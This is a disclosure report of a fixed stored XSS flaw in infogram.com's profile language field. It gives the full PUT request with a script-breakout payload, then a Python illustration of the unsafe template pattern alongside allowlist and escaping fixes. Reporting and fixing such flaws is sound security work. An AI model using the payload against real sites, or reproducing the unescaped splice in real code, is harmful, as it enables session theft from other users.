Stored XSS in infogram.com via language
Discovered by theappsec on Infogram

This issue took 0 days and 12 hours to triage and 0 days and 3 hours to resolve once triaged.
The stored XSS was found in the language parameter of the user profile settings: the submitted value is stored and later rendered into the user's public profile page.

PoC: Change the profile settings with the following request:

PUT /api/users/me HTTP/1.1
Host: infogram.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrf-token: **your token**
X-Requested-With: XMLHttpRequest
Content-Length: 135
DNT: 1
Connection: close
Cookie: **your cookies**

first_name=name&last_name=name&username=&confirm_password=password&language=></script><img src=x onerror=alert(document.domain)>;//

Then open your public profile link, where the stored payload executes.

Example: https://infogram.com/dd_ddt7
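As an added illustration that is not part of the original report, the Python below shows the unsafe pattern the PoC payload exploits (a stored language value spliced into an inline script, which "></script>" terminates early) beside the two fixes a defender would apply: allowlisting the language code in the PUT /api/users/me handler so the payload is never stored, and escaping "<" when serializing the value into the script element. The allowlist, the template shape and the function names are assumptions; the payload string is the one from the PoC.

```python
import json
import re

# Constructed allowlist of locale codes; the real set Infogram accepts is
# not given in the report, so this is an assumption for the example.
SUPPORTED_LANGUAGES = {"en", "de", "es", "fr", "lv", "ru"}
LANGUAGE_CODE = re.compile(r"[a-z]{2}(-[A-Z]{2})?")

# Payload string taken from the report's PoC request body.
PAYLOAD = "></script><img src=x onerror=alert(document.domain)>;//"


def is_supported_language(value: str) -> bool:
    """Input validation for the language field of the profile update.

    A language code is a short fixed-format token, so the handler can reject
    anything else before it is stored, which removes the stored part of the bug.
    """
    return bool(LANGUAGE_CODE.fullmatch(value)) and value in SUPPORTED_LANGUAGES


def render_profile_script_unsafe(language: str) -> str:
    # Vulnerable pattern (assumed): the stored value is spliced straight into
    # an inline script. '></script>' in the value terminates the script element
    # and the rest of the value is parsed as HTML, which is how the PoC fires.
    return '<script>var profile = {"language": "' + language + '"};</script>'


def render_profile_script_safe(language: str) -> str:
    # Hardened output encoding: json.dumps handles quotes and control
    # characters, and replacing '<' with its JSON escape ensures no '</script'
    # sequence can appear inside the element whatever was stored.
    data = json.dumps({"language": language}).replace("<", "\\u003c")
    return "<script>var profile = " + data + ";</script>"


def script_breakout(html: str) -> bool:
    """True if the rendered page contains more than the one closing script tag
    the template itself emits, i.e. the stored value ended the script early."""
    return html.lower().count("</script>") > 1


if __name__ == "__main__":
    print("validation rejects payload:", not is_supported_language(PAYLOAD))
    print("unsafe template broken out:", script_breakout(render_profile_script_unsafe(PAYLOAD)))
    print("safe template broken out:", script_breakout(render_profile_script_safe(PAYLOAD)))
```

Validation and output encoding are independent layers: the allowlist keeps the payload out of the database, and the escaped serialization keeps a value that somehow got stored from ending the script element.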

Impact

This allows an attacker to inject arbitrary JavaScript that runs in the browser of anyone viewing the profile and can be used to steal information from Infogram's users.